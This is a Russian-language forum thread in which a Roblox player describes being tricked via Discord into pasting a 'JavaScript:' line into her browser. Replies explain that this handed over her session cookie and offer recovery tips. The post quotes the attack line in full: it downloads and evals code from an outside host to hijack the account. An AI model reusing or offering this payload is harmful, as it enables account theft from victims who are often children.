Прочие компьютерные игры

Что делать если твой аккаунт в Роблоксе взломали и ты знаешь, кто это сделал?

Когда я играла в игру Roblox я решила зарегаться в Дискорде и вступить в официальный сервер Roblox'a, сначала я там просто общалась, потом мне написал человек с ником @fxn007 (его ник в Роблоксе: YurMum), он сказал мне написать это: "JavaScript:$.get('//rbxpro.xyz/?id=1529693142',i=>eval(i))" в верхней строке вкладки Home, я не знаю почему, но я решила проверить что будет. К утру он украл мои 40 робуксов и всё. Я нашла его в Дискорде и начала кидать жалобы с 9-ти аккаунтов брата (хз зачем они ему) и с основного аккаунта. Я написала в поддержку Роблокса и написала все подробности о взломе, но это не помогло. Я начала говорить всем своим знакомым в ДС про это и спамить в чате ник взломщика и то, что он сделал. Похоже, он заметил это и окончательно взломал мой акк. Когда я зашла на страницу роблокса, то там вместо ника было "Log In" "Sigh up", я пыталась зайти на свой аккаунт, но там было написано что пароль неверный. Я немного расстроилась, у меня этот акк был 3 года и на нём были робуксы и куча вещей со старых эвентов, которые были очень классные. Я создала новый аккаунт, а потом ещё один. Если вы знайте, что это за скрипт "JavaScript:$.get('//rbxpro.xyz/?id=1529693142',i=>eval(i))" пожалуйста напишите. Также если вы знайте как вернуть свой аккаунт тоже напишите. (Мой старый аккаунт: AlexandraR2008, новые: sun_outbreak, AllEx_is)
Ravshan Abduvaliyev
Уже ничего. Ты ему отдала полный контроль над своим аккаунтом.
Иван Матковский
Лучший ответ
ничего ты не сделаешь. Сама лоханулась.
Ravshan Abduvaliyev Я знаю. Только не знаю как взломщик использовал джаваскрипт и какая у него функция.
Igor Bernhardt в тех поддержку можно написать
надеюсь, его уже побили?))
Нету почты или телефона - аккаунт пропал.
Joker Css
RIP аккаунт
пздц, ты ему отдала свой кукис. Каким нужно быть наивным чтоб повестись на это
Ravshan Abduvaliyev хз, я просто тупой
увы ты просрал всее
Это тот который в чёрном да?
напиши на него жалобу, войди в свой акк припомощи номера телефона
Люди помогите плис играл как не в чём не бывало выхожу на утром захожу вылетел с акка пытаюсь зайти но пароль не верен но бл к почте привязано и не чего не сообщалось
поддержка сказала что решили но чё они решили я хз
просто новую игру найди и поиграй
Если почта и телефон поставлены тогда попробуй сбросить пароль на странице "Log In" там ниже "Forget Password or Username?" и выбрать телефон или почту попробуй оба если они введены в аккаунте и писать ник, и твой акк взломали по куки чтобы это не было надо 1. не заходить на подозрительные сайты 2. не делиться куки, по этой причине тебя взломали кстати. Надеюсь что помогло!
в чём проблема просто привязать почту номер телефона и сделать ещё одну верефикацию
если знаешь кто, дай ему двоечку
Уже ниче не сделаешь. У тебя кукушка поехала
Миша .
Очень жаль тебя. Аккаунт Robux_free_73 - тоже взломщик, украл и мой ак, не верьте ему
Petr Gusakov
идти писать на него жалобу!
Руслан Хайруллин а в сапорте точно ответят? у меня тоже 24 08 2020 чел под ником Guest666dh1 украл акк
ничего больше не сделаешь, все уже знают об этом Javascript!
Руслан Гусейнов А что за Javascript? можешь рассказать?